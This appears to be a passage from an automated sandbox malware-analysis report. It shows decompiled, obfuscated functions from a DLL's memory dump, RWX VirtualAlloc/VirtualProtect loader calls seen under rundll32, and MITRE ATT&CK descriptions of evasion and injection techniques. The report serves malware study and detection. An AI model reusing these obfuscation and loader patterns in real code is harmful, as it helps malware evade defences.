Opcode ID: a434f546294ff16000c075816f5c378907933f48be170b95346e54a9c6ecf090
Instruction ID: 09d104b3569b40cdf1e2eac93812f098ef1987b0bb3f4b9a0914b615a5c2b440
Opcode Fuzzy Hash: a434f546294ff16000c075816f5c378907933f48be170b95346e54a9c6ecf090
Instruction Fuzzy Hash: 1B41F472D0120AEBDF08CFE5D94A9DEBBB1FB44304F208199E115BA2A0D7B95B55DF80

Uniqueness

Uniqueness Score: -1.00%

Function 10010B8A Relevance: .1, Instructions: 74
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E10010B8A(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _t100;
				signed int _t101;

				_v36 = 0x5aa;
				_v36 = _v36 >> 0x10;
				_v36 = _v36 ^ 0x0000330c;
				_v32 = 0xdf00;
				_v32 = _v32 | 0xab132c2b;
				_v32 = _v32 ^ 0xab13f0c0;
				_v8 = 0x63ed;
				_t100 = __edx;
				_v8 = _v8 * 0x4e;
				_v8 = _v8 ^ 0xf2c24d67;
				_v8 = _v8 ^ 0x1b3721e6;
				_v8 = _v8 ^ 0xe9eb1c06;
				_v24 = 0xe288;
				_v24 = _v24 + 0xbb54;
				_v24 = _v24 + 0xdb0d;
				_v24 = _v24 ^ 0x00023210;
				_v40 = 0x5eed;
				_v40 = _v40 + 0xffff6eb1;
				_v40 = _v40 ^ 0xfffff76e;
				_v12 = 0x6942;
				_v12 = _v12 << 0xe;
				_v12 = _v12 >> 4;
				_t101 = 0xb;
				_push(__ecx);
				_v12 = _v12 / _t101;
				_v12 = _v12 ^ 0x00267602;
				_v28 = 0x620d;
				_v28 = _v28 + 0xffff96d2;
				_v28 = _v28 << 0xa;
				_v28 = _v28 ^ 0xffe35567;
				_v20 = 0x2a57;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x7bcf801d;
				_v20 = _v20 * 0x1d;
				_v20 = _v20 ^ 0x05537e8d;
				_v16 = 0x5dcb;
				_v16 = _v16 << 0xb;
				_v16 = _v16 | 0x4e4aa2fe;
				_v16 = _v16 + 0x15cc;
				_v16 = _v16 ^ 0x4eef698c;
				_push(_v24);
				_push(_v8);
				 *((intOrPtr*)( *0x10021080 + 0x1c + _t100 * 4)) = E100149CF(_v40, _v12, E10005DFC(_v36, _v32, _v16));
				return E10010D6D(_v28, _v20, _v16, _t86);
			}

0x10010b90
0x10010b97
0x10010b9b
0x10010ba2
0x10010ba9
0x10010bb0
0x10010bb7
0x10010bc6
0x10010bca
0x10010bcd
0x10010bd4
0x10010bdb
0x10010be2
0x10010be9
0x10010bf0
0x10010bf7
0x10010bfe
0x10010c05
0x10010c0c
0x10010c13
0x10010c1a
0x10010c1e
0x10010c25
0x10010c28
0x10010c29
0x10010c2c
0x10010c33
0x10010c3a
0x10010c41
0x10010c45
0x10010c4c
0x10010c53
0x10010c57
0x10010c62
0x10010c65
0x10010c6c
0x10010c73
0x10010c77
0x10010c7e
0x10010c85
0x10010c8c
0x10010c8f
0x10010cb8
0x10010ccc

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16ced892de25bbfd09f60c5a5c3df2f13e031e09c132dc7e5d3e7b6f3acf528a
Instruction ID: 925a39c79184c0a3dd7d88e7f5c85727f9e2ad9f375ff6d06a0b7bb487f4ce33
Opcode Fuzzy Hash: 16ced892de25bbfd09f60c5a5c3df2f13e031e09c132dc7e5d3e7b6f3acf528a
Instruction Fuzzy Hash: 8531F171C0021AEBDF58CFA5D94A4DEBBB1FB44314F208199C122B72A0D7B95B45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 10007378 Relevance: .1, Instructions: 73
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E10007378(intOrPtr _a8, intOrPtr _a16, signed int _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _v48;
				intOrPtr _v52;
				void* _t84;
				signed int _t86;
				signed int _t92;

				_v52 = 0x16987;
				_t92 = _a20;
				asm("stosd");
				_t86 = 0x19;
				asm("stosd");
				asm("stosd");
				_v32 = 0xbca3;
				_v32 = _v32 + 0xffa8;
				_v32 = _v32 ^ 0x0001b5a0;
				_v28 = 0x7499;
				_v28 = _v28 ^ 0x8b4212c4;
				_v28 = _v28 ^ 0x8b424b18;
				_v24 = 0x998c;
				_v24 = _v24 + 0xffffcf68;
				_v24 = _v24 ^ 0x0000327c;
				_v20 = 0xcacf;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x0032e4d9;
				_v36 = 0xb036;
				_v36 = _v36 * 0x6f;
				_v36 = _v36 ^ 0x004c1ab0;
				_v16 = 0xe7fa;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 * 0x72;
				_v16 = _v16 ^ 0x0000227a;
				_v12 = 0xf6b9;
				_v12 = _v12 | 0x229c8a7f;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x08e044b9;
				_v12 = _v12 ^ 0xf61f6f05;
				_v8 = 0xd627;
				_v8 = _v8 ^ 0xe545ff33;
				_v8 = _v8 / _t86;
				_v8 = _v8 | 0x013bd0a8;
				_v8 = _v8 ^ 0x093b8413;
				if( *((intOrPtr*)(0x10020408 + _t92 * 4)) == 0) {
					_push(_t86);
					_push(_t86);
					_t84 = E10010223(_a16);
					_push(_a8);
					_push(_v8);
					_push(_v12);
					_push(_v16);
					 *((intOrPtr*)(0x10020408 + _t92 * 4)) = E1001C4DD(_v36, _t84);
				}
				return  *((intOrPtr*)(0x10020408 + _t92 * 4));
			}

0x1000737e
0x1000738c
0x1000738f
0x10007394
0x10007395
0x10007396
0x10007397
0x1000739e
0x100073a5
0x100073ac
0x100073b3
0x100073ba
0x100073c1
0x100073c8
0x100073cf
0x100073d6
0x100073dd
0x100073e1
0x100073e8
0x100073f3
0x100073f6
0x100073fd
0x10007404
0x1000740c
0x1000740f
0x10007416
0x1000741d
0x10007424
0x10007428
0x1000742f
0x10007436
0x1000743d
0x10007449
0x1000744c
0x10007453
0x10007462
0x10007470
0x10007471
0x10007475
0x1000747a
0x1000747f
0x10007482
0x10007485
0x10007493
0x10007493
0x100074a6

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe226a8a923b63f17ed5cb043c32f7a565b0df65fb12a0d1d977b04ae3c82b13
Instruction ID: 581500dd9beace1e7311182736666e0e1729c442be36952091c1226a1adf18e8
Opcode Fuzzy Hash: fe226a8a923b63f17ed5cb043c32f7a565b0df65fb12a0d1d977b04ae3c82b13
Instruction Fuzzy Hash: 8E31F2B5D0021DEFEF48DFA4D94A4EEBBB5FB44304F108059EA11B6260D3B89A45DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 10005418 Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E10005418(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t53;
				signed int _t66;
				signed int _t67;
				void* _t79;
				intOrPtr _t80;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10012550(_t53);
				_v32 = 0x6749d6;
				_t80 = 0;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0xfeb6;
				_v16 = _v16 ^ 0x1a3a87a5;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x068ee483;
				_v12 = 0xf4bf;
				_v12 = _v12 << 5;
				_v12 = _v12 >> 6;
				_v12 = _v12 ^ 0x00001984;
				_v20 = 0x5159;
				_v20 = _v20 >> 0xa;
				_v20 = _v20 ^ 0x00003ebb;
				_v8 = 0x7bf9;
				_t66 = 0x7e;
				_v8 = _v8 / _t66;
				_v8 = _v8 ^ 0xf75420d9;
				_t67 = 0x73;
				_v8 = _v8 / _t67;
				_v8 = _v8 ^ 0x0226967d;
				_t79 = E100054FB(0x40000);
				if(_t79 != 0) {
					_push(_t79);
					_push(_a4);
					_push(_a20);
					_t80 = E100116E0(_a12, _a16);
					E1000DE81(_v20, _t79, _v8);
				}
				return _t80;
			}

0x10005420
0x10005423
0x10005426
0x10005429
0x1000542c
0x1000542f
0x10005430
0x10005431
0x10005436
0x1000543d
0x1000543f
0x10005444
0x10005447
0x1000544e
0x10005455
0x10005459
0x10005460
0x10005467
0x1000546b
0x1000546f
0x10005476
0x1000547d
0x10005481
0x10005488
0x10005494
0x10005499
0x1000549e
0x100054a8
0x100054b3
0x100054b6
0x100054c8
0x100054cd
0x100054d5
0x100054d6
0x100054d9
0x100054e9
0x100054eb
0x100054f0
0x100054fa

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c524b21261d76773f5d7c74b417b0e1b019995d9dbf959723682bfc805f13a9
Instruction ID: 56a8487d0004a1665610667e4f862ddd29e29dd9299b20068e212d2c56b78168
Opcode Fuzzy Hash: 5c524b21261d76773f5d7c74b417b0e1b019995d9dbf959723682bfc805f13a9
Instruction Fuzzy Hash: 38216676D0020DEBDF05CFE9D80A9DFBBB2EB44304F108099E914A7250C7B69A60DF80

Uniqueness

Uniqueness Score: -1.00%

Function 1000DE81 Relevance: .1, Instructions: 60
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E1000DE81(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t61;
				signed int _t71;

				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10012550(_t61);
				_v8 = 0x815e;
				_v8 = _v8 | 0x0f7b832c;
				_t71 = 0x1f;
				_v8 = _v8 / _t71;
				_v8 = _v8 ^ 0x007fc6d9;
				_v20 = 0x1739;
				_v20 = _v20 | 0x0d3215ff;
				_v20 = _v20 ^ 0x0d32419d;
				_v24 = 0x65f5;
				_v24 = _v24 + 0x3c25;
				_v24 = _v24 ^ 0x0000c547;
				_v16 = 0xa0ce;
				_v16 = _v16 + 0xefa2;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x00000fc3;
				_v16 = 0x5b12;
				_v16 = _v16 | 0xa0c0d766;
				_v16 = _v16 * 0x44;
				_v16 = _v16 ^ 0xb33b088d;
				_v24 = 0x32c7;
				_v24 = _v24 ^ 0x4853b697;
				_v24 = _v24 ^ 0x4853c8a7;
				_v16 = 0x1aa;
				_v16 = _v16 + 0x7f2c;
				_v16 = _v16 | 0xff30d166;
				_v16 = _v16 ^ 0xff30c9aa;
				_v12 = 0xd947;
				_v12 = _v12 ^ 0x0ebf1cd4;
				_v12 = _v12 + 0xffff3fa5;
				_v12 = _v12 ^ 0x0ebf1307;
				return E10003A9D(__edx, _v24, _v16, _v12, _t71, E10007AA1(_t71));
			}

0x1000de88
0x1000de8d
0x1000de8e
0x1000de8f
0x1000de94
0x1000de9e
0x1000deac
0x1000deaf
0x1000deb2
0x1000deb9
0x1000dec0
0x1000dec7
0x1000dece
0x1000ded5
0x1000dedc
0x1000dee3
0x1000deea
0x1000def1
0x1000def5
0x1000defc
0x1000df03
0x1000df0e
0x1000df11
0x1000df18
0x1000df1f
0x1000df26
0x1000df2d
0x1000df34
0x1000df3b
0x1000df42
0x1000df49
0x1000df50
0x1000df57
0x1000df5e
0x1000df89

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47619f77d15d650af17f0a4cc88ed58ba79014e9d70a39a1b2907f2ac558bd10
Instruction ID: 32ca61c15a42b6515979a5b57979a619cdc6bda1d63e339a7c28caa4cb9f5c7b
Opcode Fuzzy Hash: 47619f77d15d650af17f0a4cc88ed58ba79014e9d70a39a1b2907f2ac558bd10
Instruction Fuzzy Hash: DE21F375D0130DEBEB48CFA6C90A4AEBFB5EB40318F108099D425B6290D3B85B14DF92

Uniqueness

Uniqueness Score: -1.00%

Function 10011DFE Relevance: .0, Instructions: 47
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10011DFE(void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;

				_v32 = _v32 & 0x00000000;
				_v12 = 0xa959;
				_v12 = _v12 >> 6;
				_v12 = _v12 ^ 0x0d27cc61;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0xcec4698e;
				_v8 = 0x266;
				_v8 = _v8 | 0x1b157375;
				_v8 = _v8 >> 9;
				_v8 = _v8 | 0x60c31c80;
				_v8 = _v8 ^ 0x60cfecf0;
				_v20 = 0xddd8;
				_v20 = _v20 | 0xb972bece;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x20fc7b64;
				_v20 = _v20 ^ 0xc537d2af;
				_v28 = 0x5083;
				_v28 = _v28 << 0xc;
				_v28 = _v28 ^ 0x05080fa9;
				_v24 = 0xe86a;
				_v24 = _v24 >> 5;
				_v24 = _v24 + 0xc90c;
				_v24 = _v24 ^ 0x00009a6e;
				_v16 = 0x5939;
				_v16 = _v16 << 1;
				_v16 = _v16 + 0xfb70;
				_v16 = _v16 + 0xffff7911;
				_v16 = _v16 ^ 0x000120b2;
				E10016A9A(_v20, _v28, _v24, _v16, E10011999(),  &_v32);
				return _v32;
			}

0x10011e04
0x10011e08
0x10011e0f
0x10011e13
0x10011e1a
0x10011e1e
0x10011e25
0x10011e2c
0x10011e33
0x10011e37
0x10011e3e
0x10011e45
0x10011e4c
0x10011e53
0x10011e57
0x10011e5e
0x10011e65
0x10011e6c
0x10011e70
0x10011e77
0x10011e7e
0x10011e82
0x10011e89
0x10011e90
0x10011e97
0x10011e9a
0x10011ea1
0x10011ea8
0x10011ecb
0x10011ed9

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bd66c3414af41d30ad53092081a3d7845d29b2687e5c3fdf6ea99daaf4f402b
Instruction ID: 858aee6eae2468bb7ddf381fdcf385477cb1ad85bb215f6f274f08af1fd3a9bf
Opcode Fuzzy Hash: 1bd66c3414af41d30ad53092081a3d7845d29b2687e5c3fdf6ea99daaf4f402b
Instruction Fuzzy Hash: EF21AC75D0020EEFDB59DFE4C94A5AEFBB0EB10708F208588D42276251D3B91B49DF91

Uniqueness

Uniqueness Score: -1.00%

Function 10014F04 Relevance: .0, Instructions: 45
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10014F04(void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x77d1f3;
				_v32 = 0x102c4a;
				_v28 = 0x31c61e;
				_v12 = 0xccec;
				_v12 = _v12 >> 5;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 | 0xecb7e12e;
				_v12 = _v12 ^ 0xecb7f166;
				_v8 = 0x1581;
				_v8 = _v8 | 0xff7deff7;
				_v8 = _v8 ^ 0xd17bf610;
				_v8 = _v8 ^ 0x2e060f97;
				_v16 = 0x4eb3;
				_v16 = _v16 + 0xfffffcad;
				_v16 = _v16 ^ 0xeadf5fa4;
				_v16 = _v16 ^ 0xeadf108b;
				_v20 = 0x2120;
				_v20 = _v20 ^ 0xb07dd198;
				_t53 = 0x4f;
				_v20 = _v20 / _t53;
				_v20 = _v20 ^ 0x023bed5f;
				return 0 | E1001C631(_v12, _a4,  *((intOrPtr*)( *0x10021090 + 0x1c)), _v8, _v16) != _v20;
			}

0x10014f0a
0x10014f10
0x10014f17
0x10014f1e
0x10014f25
0x10014f2c
0x10014f30
0x10014f34
0x10014f3b
0x10014f42
0x10014f49
0x10014f50
0x10014f57
0x10014f5e
0x10014f65
0x10014f6c
0x10014f73
0x10014f7a
0x10014f81
0x10014f8d
0x10014f93
0x10014f96
0x10014fc5

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ff94fc5db09bf2cffc6a641dbfc9c41617e5a91856c6a501d2d6f82b6806102
Instruction ID: 128df5a67b4e3f120555745bb77ba77c04924e8fddb12a46ec6b993f87052704
Opcode Fuzzy Hash: 7ff94fc5db09bf2cffc6a641dbfc9c41617e5a91856c6a501d2d6f82b6806102
Instruction Fuzzy Hash: 7A11E474D4020DEBDB08CFA5D98A9EEBBB1FF54314F108598D525AA2A0C7B85B55CF40

Uniqueness

Uniqueness Score: -1.00%

Function 10003278 Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003278() {

				return  *[fs:0x30];
			}

0x1000327e

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 5828, Parent PID: 3116COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	13
Total number of Limit Nodes:	1

Executed Functions

Function 008CEB30 Relevance: 4.7, APIs: 3, Instructions: 240
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 008CEB75
VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 008CEC3F
VirtualProtect.KERNEL32(?,?,00000000), ref: 008CED70

Memory Dump Source

Source File: 00000002.00000002.334399466.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8b0000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$Protect
String ID:
API String ID: 655996629-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 4b861a5021b487562b43bab4528b2017859dee7396548acb7f19ac45eac76a57
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: F8B19AB5A00109DFCB48CF88C590EAEB7B5FF88314F208159E919AB355D735EE82CB95

Uniqueness

Uniqueness Score: -1.00%

Function 008CE550 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 008CE5D4

Strings

VirtualAlloc, xrefs: 008CE5B9, 008CE5BC

Memory Dump Source

Source File: 00000002.00000002.334399466.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8b0000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: e2633b7725cb583183b460999a7bde8ac39b12d545aaa8cd1ba162eac5dcea19
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: F7110DA0D082C9EEEB01DBE89409BEEBFB55B11704F044098E5456B282D6BA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 2776, Parent PID: 5660COMMON

Execution Graph

Execution Coverage:	6.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	13
Total number of Limit Nodes:	1

Executed Functions

Function 00D5EB30 Relevance: 4.7, APIs: 3, Instructions: 240
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00D5EB75
VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00D5EC3F
VirtualProtect.KERNEL32(?,?,00000000), ref: 00D5ED70

Memory Dump Source

Source File: 00000010.00000002.766441900.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_d40000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$Protect
String ID:
API String ID: 655996629-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 256e4c70fb4ccb1645bd3c9be9a01b65342e0b1452d02a442400a6f20a6457ef
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: 47B19AB5A00109DFCB48DF84C590AAEB7B5FF88305F248159ED15AB345D735EE86CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D5E550 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00D5E5D4

Strings

VirtualAlloc, xrefs: 00D5E5B9, 00D5E5BC

Memory Dump Source

Source File: 00000010.00000002.766441900.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_d40000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: ba528e26c4eee826aa7b69372bc9e5a071751a0ca8fcaccbabf861b2ffca6dfe
Instruction ID: 5d497864aede4d1763bcd369f5ec6ad20dbedb4b4ee0f83a1410260a425ac258
Opcode Fuzzy Hash: ba528e26c4eee826aa7b69372bc9e5a071751a0ca8fcaccbabf861b2ffca6dfe
Instruction Fuzzy Hash: 8E113D60D08289EEEF01DBE88409BEEBFB55B11705F044098E9446B282D2BA57588BB6

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
